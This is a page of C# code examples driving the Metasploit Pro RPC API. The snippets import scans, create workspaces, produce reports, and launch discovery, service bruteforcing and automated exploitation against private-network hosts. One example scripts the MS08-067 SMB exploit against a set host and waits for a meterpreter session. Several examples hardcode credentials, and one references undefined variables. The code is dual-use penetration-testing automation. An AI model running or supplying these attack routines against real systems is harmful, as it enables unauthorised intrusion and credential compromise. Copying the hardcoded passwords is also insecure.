Пример #1
0
        private bool ImportFileIntoMetasploitPro(string filename, string workspace)
        {
            using (MetasploitSession session = new MetasploitSession(this.Configuration["metasploitUser"],
                                                                     this.Configuration["metasploitPass"],
                                                                     "https://" + this.Configuration["metasploitHost"] + ":3790/api/1.1")) {
                using (MetasploitProManager manager = new MetasploitProManager(session)) {
                    Dictionary <string, object> options = new Dictionary <string, object> ();
                    options.Add("workspace", workspace);
                    options.Add("DS_PATH", filename);
                    options.Add("preserve_hosts", true);

                    Dictionary <string, object> response = manager.StartImport(options);

                    foreach (var pair in response)
                    {
                        Console.WriteLine(pair.Key + ": " + pair.Value);
                    }

                    Dictionary <string, object> taskResponse = manager.GetProTaskStatus(response ["task_id"] as string);

                    taskResponse = taskResponse.First().Value as Dictionary <string, object>;

                    while (taskResponse["status"] as string == "running")
                    {
                        Console.WriteLine("Waiting on file import: " + filename);
                        Thread.Sleep(new TimeSpan(0, 0, 60));
                        taskResponse = manager.GetProTaskStatus(response ["task_id"] as string);
                        taskResponse = taskResponse.First().Value as Dictionary <string, object>;
                    }

                    return(true);
                }
            }
        }
Пример #2
0
        private bool MetasploitProAssessmentIsRunning(string msfProScanID)
        {
            using (MetasploitSession session = new MetasploitSession(this.Configuration["metasploitUser"],
                                                                     this.Configuration["metasploitPass"],
                                                                     "https://" + this.Configuration["metasploitHost"] + ":3790/api/1.1")) {
                using (MetasploitProManager manager = new MetasploitProManager(session)) {
                    Dictionary <string, object> response = manager.GetProTaskStatus(msfProScanID);

                    if (response.ContainsKey("error"))
                    {
                        throw new Exception(response ["error_message"] as string);
                    }

                    string status = (response.First().Value as Dictionary <string, object>) ["status"] as string;

                    if (status == "running")
                    {
                        return(true);
                    }
                    else
                    {
                        return(false);
                    }
                }
            }
        }
Пример #3
0
        private XmlNode GetMetasploitProReport(string workspace)
        {
            Console.WriteLine("Generating report for workspace: " + workspace);

            string taskID = string.Empty;

            using (MetasploitSession session = new MetasploitSession(this.Configuration["metasploitUser"],
                                                                     this.Configuration["metasploitPass"],
                                                                     "https://" + this.Configuration["metasploitHost"] + ":3790/api/1.1")) {
                using (MetasploitProManager manager = new MetasploitProManager(session)) {
                    Dictionary <string, object> options = new Dictionary <string, object> ();
                    options.Add("DS_WHITELIST_HOSTS", string.Empty);
                    options.Add("DS_BLACKLIST_HOSTS", string.Empty);
                    options.Add("workspace", workspace);
                    options.Add("DS_MaskPasswords", false);
                    options.Add("DS_IncludeTaskLog", false);
                    options.Add("DS_JasperDisplaySession", true);
                    options.Add("DS_JasperDisplayCharts", true);
                    options.Add("DS_LootExcludeScreenshots", false);
                    options.Add("DS_LootExcludePasswords", false);
                    options.Add("DS_JasperTemplate", "msfxv3.jrxml");
                    options.Add("DS_REPORT_TYPE", "XML");
                    options.Add("DS_UseJasper", true);
                    options.Add("DS_UseCustomReporting", true);
                    options.Add("DS_JasperProductName", "AutoAssess");
                    options.Add("DS_JasperDbEnv", "production");
                    options.Add("DS_JasperLogo", string.Empty);
                    options.Add("DS_JasperDisplaySections", "1,2,3,4,5,6,7,8");
                    options.Add("DS_EnablePCIReport", true);
                    options.Add("DS_EnableFISMAReport", true);
                    options.Add("DS_JasperDisplayWeb", true);
                    options.Add("DS_CAMPAIGN_ID", "-1");

                    Dictionary <string, object> response = manager.StartReport(options);

                    Dictionary <string, object> taskResponse = manager.GetProTaskStatus(response ["task_id"] as string);

                    taskResponse = taskResponse.First().Value as Dictionary <string, object>;

                    while (taskResponse["status"] as string == "running")
                    {
                        Console.WriteLine("Waiting on metasploit report");
                        Thread.Sleep(new TimeSpan(0, 0, 60));
                        taskResponse = manager.GetProTaskStatus(response ["task_id"] as string);
                        taskResponse = taskResponse.First().Value as Dictionary <string, object>;
                    }

                    response = manager.DownloadReportByTask(response ["task_id"] as string);

                    taskID = response ["data"] as string;
                }
            }

            XmlDocument doc = new XmlDocument();

            doc.LoadXml(taskID);

            return(doc.LastChild);
        }
Пример #4
0
        private void CreateNewMetasploitWorkspace(string workspace)
        {
            using (MetasploitSession session = new MetasploitSession(this.Configuration["metasploitUser"],
                                                                     this.Configuration["metasploitPass"],
                                                                     "https://" + this.Configuration["metasploitHost"] + ":3790/api/1.1")) {
                using (MetasploitProManager manager = new MetasploitProManager(session)) {
//					Dictionary<object, object> options = new Dictionary<object, object>();
//					options.Add("name", workspace);
//
//					manager.AddProWorkspace(options);

                    Dictionary <string, object> response = manager.CreateConsole();
                    string consoleID = response ["id"] as string;

                    manager.WriteToConsole(consoleID, "workspace -a \"" + workspace + "\"\n");
                    Thread.Sleep(new TimeSpan(0, 0, 30));
                    manager.WriteToConsole(consoleID, "workspace \n");
                    manager.DestroyConsole(consoleID);
                }
            }
        }
Пример #5
0
        public static void Main(string[] args)
        {
            using (MetasploitSession session = new MetasploitSession("metasploit", "2c8X|a2!", "https://192.168.1.148:3790/api/1.1"))
            {
                using (MetasploitProManager manager = new MetasploitProManager(session))
                {
                    Dictionary <string, object> options = new Dictionary <string, object>();
                    options.Add("workspace", "default");
                    options.Add("DS_PATH", "/tmp/efc63839-ae8d-4caf-92f5-3f3ff7b6e306");

                    Dictionary <string, object> response = manager.StartImport(options);

                    foreach (var pair in response)
                    {
                        Console.WriteLine(pair.Key + ": " + pair.Value);
                    }

                    response = manager.GetProTaskStatus(response["task_id"] as string);

                    foreach (var pair in response)
                    {
                        string stat = (pair.Value as Dictionary <string, object>)["status"] as string;

                        while (stat == "running")
                        {
                            System.Threading.Thread.Sleep(500);

                            response = manager.GetProTaskStatus(response["task_id"] as string);

                            foreach (var p in response)
                            {
                                stat = (p.Value as Dictionary <string, object>)["status"] as string;
                            }
                        }
                    }
                }
            }
        }
Пример #6
0
        public static void Main(string[] args)
        {
            using (MetasploitSession session = new MetasploitSession("metasploit", "2c8X|a2!", "https://192.168.1.148:3790/api/1.1"))
            {
                using (MetasploitProManager manager = new MetasploitProManager(session))
                {
//						{
//						"workspace" => "Project1",
//						"DS_WHITELIST_HOSTS" => "192.168.0.0/24",
//						"DS_MinimumRank" => "great",
//						"DS_EXPLOIT_SPEED" => 5,
//						"DS_EXPLOIT_TIMEOUT" => 2,
//						"DS_LimitSessions" => true,
//						"DS_MATCH_VULNS" => true,
//						"DS_MATCH_PORTS" => true
//						}

                    Dictionary <string, object> options = new Dictionary <string, object>();
                    options.Add("workspace", "default");
                    options.Add("DS_WHITELIST", "192.168.1.0/24");
                    options.Add("DS_MinimumRank", "great");
                    options.Add("DS_EXPLOIT_SPEED", 5);
                    options.Add("DS_EXPLOIT_TIMEOUT", 2);
                    options.Add("DS_LimitSessions", true);
                    options.Add("DS_MATCH_VULNS", true);
                    options.Add("DS_MATCH_PORTS", true);

                    Dictionary <string, object> response = manager.StartExploit(options);

                    foreach (var pair in response)
                    {
                        Console.WriteLine(pair.Key + ": " + pair.Value);
                    }
                }
            }
        }
Пример #7
0
        public static void Main(string[] args)
        {
            using (MetasploitSession session = new MetasploitSession("metasploit", "P@ssw0rd!", "https://192.168.1.5:3790/api/1.1"))
            {
                using (MetasploitProManager manager = new MetasploitProManager(session))
                {
                    Dictionary <string, object> modules = manager.GetCoreModuleStats();

                    Console.WriteLine("Module stats:");
                    foreach (KeyValuePair <string, object> pair in modules)
                    {
                        Console.WriteLine(pair.Key + ": " + pair.Value);
                    }

                    Dictionary <string, object> version = manager.GetCoreVersionInformation();

                    Console.WriteLine("\n\nVersion information:");
                    foreach (KeyValuePair <string, object> pair in version)
                    {
                        Console.WriteLine(pair.Key + ": " + pair.Value);
                    }

                    Console.WriteLine("\n\nCreating console...");
                    Dictionary <string, object> consoleResponse = manager.CreateConsole();
                    foreach (KeyValuePair <string, object> pair in consoleResponse)
                    {
                        Console.WriteLine(pair.Key + ": " + pair.Value);
                    }

                    string consoleID = consoleResponse["id"] as string;

                    Console.WriteLine("\n\nConsole created, getting list of consoles...");
                    Dictionary <string, object> consoleList = manager.ListConsoles();
                    foreach (KeyValuePair <string, object> pair in consoleList)
                    {
                        Console.WriteLine(pair.Value.GetType().Name);

                        foreach (var obj in pair.Value as IList <object> )
                        {
                            //each obj is a Dictionary<string, object> in this response
                            if (obj is IDictionary <string, object> )
                            {
                                foreach (var p in obj as IDictionary <string, object> )
                                {
                                    Console.WriteLine(p.Key + ": " + p.Value);
                                }
                            }
                            else
                            {
                                Console.WriteLine(obj);
                            }
                        }
                    }

                    Console.WriteLine("\n\nDestroying our console: " + consoleID);
                    Dictionary <string, object> destroyResponse = manager.DestroyConsole(consoleID);
                    foreach (KeyValuePair <string, object> pair in destroyResponse)
                    {
                        Console.WriteLine(pair.Key + ": " + pair.Value);
                    }

                    if (destroyResponse.ContainsKey("result") && ((string)destroyResponse["result"]) == "success")
                    {
                        Console.WriteLine("Destroyed.");
                    }
                    else
                    {
                        Console.WriteLine("Failed!");
                    }

                    Dictionary <string, object> proVersion = manager.AboutPro();

                    Console.WriteLine("\n\nInformation about pro:");
                    foreach (KeyValuePair <string, object> pair in proVersion)
                    {
                        Console.WriteLine(pair.Key + ": " + pair.Value);
                    }

                    Dictionary <string, object> updateStatus = manager.ProUpdateStatus();
                    Console.WriteLine("\n\nUpdate status:");

                    foreach (KeyValuePair <string, object> pair in updateStatus)
                    {
                        Console.WriteLine(pair.Key + ": " + pair.Value);
                    }
                }
            }
        }
Пример #8
0
        private string BeginMetasploitProAssessment(string workspace, string whitelist, bool bruteforce)
        {
            using (MetasploitSession session = new MetasploitSession(this.Configuration["metasploitUser"],
                                                                     this.Configuration["metasploitPass"],
                                                                     "https://" + this.Configuration["metasploitHost"] + ":3790/api/1.1")) {
                using (MetasploitProManager manager = new MetasploitProManager(session)) {
                    Dictionary <string, object> options = new Dictionary <string, object> ();
                    Dictionary <string, object> response;
                    Dictionary <string, object> taskResponse;
                    object hosts = csv.Split(',');

                    options.Add("ips", hosts);
                    options.Add("workspace", workspace);

                    if (this.ScanOptions.MetasploitDiscovers)
                    {
                        Console.WriteLine("Discovering...");
                        response = manager.StartDiscover(options);

                        taskResponse = manager.GetProTaskStatus(response ["task_id"] as string);
                        taskResponse = taskResponse.First().Value as Dictionary <string, object>;

                        while (taskResponse["status"] as string == "running")
                        {
                            Console.WriteLine("Waiting on metasploit discovery");
                            Thread.Sleep(new TimeSpan(0, 0, 60));
                            taskResponse = manager.GetProTaskStatus(response ["task_id"] as string);
                            taskResponse = taskResponse.First().Value as Dictionary <string, object>;
                        }
                    }

                    if (this.ScanOptions.MetasploitBruteforces)
                    {
                        options = new Dictionary <string, object> ();
                        string svcs = string.Empty;
                        foreach (string service in services)
                        {
                            if (service == "postgresql")
                            {
                                svcs = svcs + "Postgresql ";
                            }
                            else if (service == "mysql")
                            {
                                svcs = svcs + "MySQL ";
                            }
                            else if (service == "mssql")
                            {
                                svcs = svcs + "MSSQL ";
                            }
                            else if (service == "oracle")
                            {
                                svcs = svcs + "Oracle ";
                            }
                            else if (service == "http")
                            {
                                svcs = svcs + "HTTP ";
                            }
                            else if (service == "https")
                            {
                                svcs = svcs + "HTTPS ";
                            }
                            else if (service == "ssh")
                            {
                                svcs = svcs + "SSH ";
                            }
                            else if (service == "telnet")
                            {
                                svcs = svcs + "Telnet ";
                            }
                            else if (service == "ftp")
                            {
                                svcs = svcs + "FTP ";
                            }
                            else if (service == "exec")
                            {
                                svcs = svcs + "EXEC ";
                            }
                            else if (service == "shell")
                            {
                                svcs = svcs + "SHELL ";
                            }
                            else if (service == "vnc")
                            {
                                svcs = svcs + "VNC ";
                            }
                        }

                        Console.WriteLine("Bruteforcing...");

                        options.Add("workspace", workspace);
                        options.Add("DS_WHITELIST_HOSTS", whitelist);
                        options.Add("DS_BRUTEFORCE_SCOPE", "quick");
                        options.Add("DS_BRUTEFORCE_SERVICES", svcs);
                        options.Add("DS_BRUTEFORCE_SPEED", "TURBO");
                        options.Add("DS_INCLUDE_KNOWN", true);
                        options.Add("DS_BRUTEFORCE_GETSESSION", true);

                        response = manager.StartBruteforce(options);

                        taskResponse = manager.GetProTaskStatus(response ["task_id"] as string);

                        taskResponse = taskResponse.First().Value as Dictionary <string, object>;

                        while (taskResponse["status"] as string == "running")
                        {
                            Console.WriteLine("Waiting on metasploit bruteforce");
                            Thread.Sleep(new TimeSpan(0, 0, 30));
                            taskResponse = manager.GetProTaskStatus(response ["task_id"] as string);
                            taskResponse = taskResponse.First().Value as Dictionary <string, object>;
                        }
                    }

                    options = new Dictionary <string, object> ();
                    options.Add("workspace", workspace);
                    options.Add("DS_WHITELIST", whitelist);
                    options.Add("DS_MinimumRank", "great");
                    options.Add("DS_EXPLOIT_SPEED", 5);
                    options.Add("DS_EXPLOIT_TIMEOUT", 2);
                    options.Add("DS_LimitSessions", false);
                    options.Add("DS_MATCH_VULNS", true);
                    options.Add("DS_MATCH_PORTS", true);

                    response = manager.StartExploit(options);

                    foreach (var pair in response)
                    {
                        Console.WriteLine(pair.Key + ": " + pair.Value);
                    }

                    return(response ["task_id"] as string);
                }
            }
        }
Пример #9
0
        public static void Main(string[] args)
        {
            using (MetasploitSession session = new MetasploitSession("metasploit", "2c8X|a2!", "https://192.168.1.148:3790/api/1.1"))
            {
                using (MetasploitProManager manager = new MetasploitProManager(session))
                {
                    Dictionary <string, object> options = new Dictionary <string, object>();
                    options.Add("DS_WHITELIST_HOSTS", string.Empty);
                    options.Add("DS_BLACKLIST_HOSTS", string.Empty);
                    options.Add("workspace", "default");
                    options.Add("DS_MaskPasswords", false);
                    options.Add("DS_IncludeTaskLog", false);
                    options.Add("DS_JasperDisplaySession", true);
                    options.Add("DS_JasperDisplayCharts", true);
                    options.Add("DS_LootExcludeScreenshots", false);
                    options.Add("DS_LootExcludePasswords", false);
                    options.Add("DS_JasperTemplate", "msfxv3.jrxml");
                    options.Add("DS_REPORT_TYPE", "PDF");
                    options.Add("DS_UseJasper", true);
                    options.Add("DS_UseCustomReporting", true);
                    options.Add("DS_JasperProductName", "AutoAssess");
                    options.Add("DS_JasperDbEnv", "production");
                    options.Add("DS_JasperLogo", string.Empty);
                    options.Add("DS_JasperDisplaySections", "1,2,3,4,5,6,7,8");
                    options.Add("DS_EnabelPCIReport", true);
                    options.Add("DS_EnableFISMAReport", true);
                    options.Add("DS_JasperDIsplayWeb", true);

                    Dictionary <string, object> response = manager.StartReport(options);

                    foreach (var pair in response)
                    {
                        Console.WriteLine(pair.Key + ": " + pair.Value);
                    }

                    string taskID = response["task_id"] as string;

                    response = manager.GetProTaskStatus(taskID);

                    bool done = false;
                    while (!done)
                    {
                        System.Text.Encoding enc = System.Text.Encoding.ASCII;
                        string status            = string.Empty;
                        foreach (var pair in response)
                        {
                            Console.WriteLine(pair.Key + ":");
                            foreach (var p in pair.Value as Dictionary <string, object> )
                            {
                                Console.WriteLine(p.Key + ": " + p.Value);
                            }

                            status = (pair.Value as Dictionary <string, object>)["status"] as string;
                        }

                        if (status != "running")
                        {
                            done = true;
                            Console.WriteLine("Done!");
                        }
                        else
                        {
                            response = manager.GetProTaskStatus(taskID);
                            Console.WriteLine("Not done yet...");
                        }
                    }
                }
            }
        }
Пример #10
0
        public static void Main(string[] args)
        {
            using (MetasploitSession session = new MetasploitSession("metasploit", "P@ssw0rd!", "https://192.168.1.5:3790/api/1.1"))
            {
                if (string.IsNullOrEmpty(session.Token))
                {
                    throw new Exception("Login failed. Check credentials");
                }

                using (MetasploitProManager manager = new MetasploitProManager(session))
                {
//					Dictionary<string, object> options = new Dictionary<string, object>();
//					options.Add("RHOST", "192.168.1.129");
//					options.Add("RPORT", "445");
//					options.Add("LPORT", new Random().Next(1001, 50000));
//
//					Dictionary<string, object> response = manager.ExecuteModule("exploit", "windows/smb/ms08_067_netapi", options);
//
//					foreach (KeyValuePair<string, object> pair in response)
//						Console.WriteLine(pair.Key + ": " + pair.Value);

                    var response = manager.CreateConsole();

                    foreach (var pair in response)
                    {
                        Console.WriteLine(pair.Key + ": " + pair.Value);
                    }

                    string consoleID = response["id"] as string;

                    Console.WriteLine("Setting up options...");

                    response = manager.WriteToConsole(consoleID, "use exploit/windows/smb/ms08_067_netapi\n");
                    System.Threading.Thread.Sleep(6000);
                    response = manager.WriteToConsole(consoleID, "set RHOST 192.168.1.129\n");
                    System.Threading.Thread.Sleep(6000);
                    response = manager.WriteToConsole(consoleID, "set LPORT " + new Random().Next(1001, 50000) + "\n");
                    System.Threading.Thread.Sleep(6000);

                    Console.WriteLine("Exploiting...");

                    response = manager.WriteToConsole(consoleID, "exploit\n");
                    System.Threading.Thread.Sleep(12000);

                    bool busy = true;

                    while (busy)
                    {
                        response = manager.ReadConsole(consoleID);

                        foreach (var pair in response)
                        {
                            Console.WriteLine(pair.Key + ": " + pair.Value);
                        }

                        busy = bool.Parse(response["busy"].ToString());

                        if ((response["prompt"] as string).Contains("meterpreter"))
                        {
                            break;
                        }
                    }

                    response = manager.ListSessions();

                    foreach (var pair in response)
                    {
                        foreach (var p in pair.Value as Dictionary <string, object> )
                        {
                            Console.WriteLine(p.Key + ": " + p.Value);
                        }
                    }

                    manager.DestroyConsole(consoleID);
                }
            }
        }